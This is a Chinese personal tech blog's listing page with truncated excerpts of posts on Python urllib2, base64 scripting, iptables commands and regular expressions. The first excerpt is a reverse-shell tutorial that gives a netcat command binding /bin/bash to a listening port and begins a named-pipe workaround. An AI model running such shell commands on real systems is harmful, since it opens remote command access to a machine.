Unix系统一般都有NC的,但是-e选项一般都默认不编译。原生的反弹shell做法是nc -l -vv -p 2222 -e /bin/bash如果这样无法反弹的话,可以尝试下面的方法现在/tmp下创建一个普通管道mknod /tmp/backpipe p或mkfifo /...

继续阅读

Python urllib2

in Python read (6375)

通过urllib2获取网页内容import urllib2response = urllib2.urlopen('http://www.baidu.com')html = response.read()print html####import urllib2req = ur...

继续阅读

本来想写一个可以编码解码BASE64的小脚本,结果出了个问题,使用base64.b64encoding(str)的时候,总提示模块中没有这个方法,于是dir(base64),发现只有寥寥几个方法,根本没有编码和解码的方法。文件如下:import sysimport base...

继续阅读

iptables 常用命令

in 安全研究,Linux read (2990)

规则的查看与清除iptables [-t tables] [-L] [-nv]-t 后面接table,若省略,则使用默认的filter-L 列出目前的table 规则-n 不进行IP与hostname的反查iptables-saveiptables [-t table] [...

继续阅读

常用正则表达式

in Web read (2886)

.at可以匹配cat sat mat #at点可以匹配任意字符[a-z]at[a-zA-Z]方括号中匹配一个集合类[^a-z]表示不属于该集合里的字符*表示可以被重复0次或更多次+表示可以被重复1次或更多次[[:alnum:]]+表示至少有一个字母字符()圆括号用于分割子表...

继续阅读

lightless

Stay Hungry. Stay Foolish.